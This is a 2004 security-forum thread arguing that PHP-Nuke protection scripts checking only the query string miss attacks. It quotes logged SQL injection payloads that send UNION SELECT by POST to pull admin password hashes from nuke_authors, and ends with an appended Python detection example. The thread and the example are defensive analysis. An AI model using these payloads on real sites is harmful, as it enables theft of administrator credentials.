Waraxe IT Security Portal  
Caution, fortress & co are useless
Posted: Sun Jun 06, 2004 10:11 am
Tora
Regular user
Joined: May 19, 2004
Posts: 9
Location: Germany

Here are 3 examples from our detection log files:
Quote:
request:
_GET[name] = Encyclopedia
_POST[file] = search
_POST[query] = -1' UNION SELECT 0,pwd FROM nuke_authors/*
_COOKIE[lastvisita] = 1086277415
Serverinfo:
REMOTE_ADDR: 82.xxx.xxx.xxx
QUERY_STRING: name=Encyclopedia
REQUEST_URI: /modules.php?name=Encyclopedia
Quote:
request:
_GET[name] = Journal
_POST[file] = search
_POST[disp] = search
_POST[bywhat] = aid
_POST[forwhat] = -1' UNION SELECT 0,0,aid,pwd,0,0,0,0,0 FROM nuke_authors/*
_COOKIE[lastvisita] = 1086277415
Serverinfo:
REMOTE_ADDR: 82.xxx.xxx.xxx
QUERY_STRING: name=Journal
REQUEST_URI: /modules.php?name=Journal
Quote:
request:
_GET[name] = FAQ
_POST[myfaq] = yes
_POST[id_cat] = -1' UNION SELECT 0,0,aid,pwd FROM nuke_authors/*
Serverinfo:
REMOTE_ADDR: 82.xxx.xxx.xxx
QUERY_STRING: name=FAQ
REQUEST_URI: /modules.php?name=FAQ

As you can see, the hackers do not attack over the URL. They dispatch the data over a form by using POST. All safety systems like fortress, which examine only the Getvars (_SERVER['query_string']), are therefore useless.

Here is a critical report on an older version of fortress. In addition, most of what is described applies to the new version.
http://vkp.shiba.de/doku/fortress.htm
Sorry, only in German...

Best wishes and greetings from Germany
Andi (aka Tora)

Last edited by Tora on Mon Jun 07, 2004 12:09 am; edited 1 time in total

Posted: Sun Jun 06, 2004 11:16 am
SteX
Advanced user
Joined: May 18, 2004
Posts: 181
Location: Serbia

I never installed that shits of protect .. :)

_________________

We would change the world, but God won't give us the sourcecode...
....Watch the master. Follow the master. Be the master....
-------------------------------------------------------

Posted: Sun Jun 06, 2004 2:36 pm
LINUX
Moderator
Joined: May 24, 2004
Posts: 404
Location: Caiman

Quote:
As you can see, the hackers do not attack over the URL. They dispatch
the data over a form by using Post. All safety systems like fortress, which examine only the Getvars (_SERVER['query_string']), are therefore useless.



Script Kiddie


A person, normally someone who is not technologically sophisticated, who randomly seeks out a specific weakness over the Internet in order to gain root access to a system without really understanding what it is s/he is exploiting because the weakness was discovered by someone else. A script kiddie is not looking to target specific information or a specific company but rather uses knowledge of a vulnerability to scan the entire Internet for a victim that possesses that vulnerability

Posted: Sun Jun 06, 2004 4:00 pm
Tora
Regular user
Joined: May 19, 2004
Posts: 9
Location: Germany

Quote:
Script Kiddie

:?: :?: Who is the script kiddie :?: :?:

_________________
Greetings from Germany
Andi aka Tora, SiteAdmin @ pragmamx.org pragmaMx developer-team

Posted: Sun Jun 06, 2004 5:35 pm
waraxe
Site admin
Joined: May 11, 2004
Posts: 2407
Location: Estonia, Tartu

Tora knows the stuff, it's obvious from his posts. Scriptkiddies are beginners who have learned how to USE exploits, but they do not YET fully understand how it works. Tora has, in my opinion, advanced knowledge/skills in phpnuke/mysql and other stuff; he/she is definitely not a scriptkiddie 8) ;)

Re: Caution, fortress & co are useless
Posted: Sun Jun 06, 2004 5:39 pm
waraxe
Site admin
Joined: May 11, 2004
Posts: 2407
Location: Estonia, Tartu

Yes, you are absolutely right - sanitizing only the GET parameters/QUERY string is useless, and POST and COOKIE variables must be sanitized too, because phpnuke globalizes all the GET/POST/COOKIE parameters and it's not hard for an attacker to inject malicious requests through COOKIE, for example...
I suggest using the Sentinel protection system. It's my favorite at the moment, and it will add a good security layer between potential attackers and the website.
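
Added example (not part of the thread, and not code from fortress, Sentinel or phpnuke): a small parser for the detection-log format quoted in the first post, comparing a check that sees only QUERY_STRING with one that inspects every GET, POST and COOKIE value. The regex signature, the function names and the third (benign) record are assumptions made for illustration; the first two records are abridged from the quoted log.

```python
import re

# Records 1 and 2 are abridged from the log quoted in the first post
# (Serverinfo trimmed to QUERY_STRING); record 3 is a constructed benign request.
LOG = """\
request:
_GET[name] = Encyclopedia
_POST[file] = search
_POST[query] = -1' UNION SELECT 0,pwd FROM nuke_authors/*
_COOKIE[lastvisita] = 1086277415
QUERY_STRING: name=Encyclopedia
request:
_GET[name] = FAQ
_POST[myfaq] = yes
_POST[id_cat] = -1' UNION SELECT 0,0,aid,pwd FROM nuke_authors/*
QUERY_STRING: name=FAQ
request:
_GET[name] = Journal
_POST[file] = search
_POST[forwhat] = admin
QUERY_STRING: name=Journal
"""

# Assumed single signature for illustration; a real filter needs a broader rule set.
SQLI = re.compile(r"\bunion\b.+\bselect\b", re.I)
FIELD = re.compile(r"^_(GET|POST|COOKIE)\[(\w+)\] = (.*)$")

def parse(log):
    """Split the log into records: {'fields': [(source, name, value)], 'qs': str}."""
    records = []
    for line in log.splitlines():
        if line == "request:":
            records.append({"fields": [], "qs": ""})
        elif m := FIELD.match(line):
            records[-1]["fields"].append(m.groups())
        elif line.startswith("QUERY_STRING: "):
            records[-1]["qs"] = line.split(": ", 1)[1]
    return records

def query_string_only(rec):
    """What a filter that inspects only QUERY_STRING would flag."""
    return bool(SQLI.search(rec["qs"]))

def all_sources(rec):
    """Inspect every GET, POST and COOKIE value; return the offending fields."""
    return [(src, name) for src, name, val in rec["fields"] if SQLI.search(val)]

def report(log=LOG):
    """Per record: (flagged by query-string-only check, fields flagged by full check)."""
    return [(query_string_only(r), all_sources(r)) for r in parse(log)]
```

For both logged requests the query-string-only check returns False while the full check names the POST field carrying the UNION SELECT; the benign record is flagged by neither.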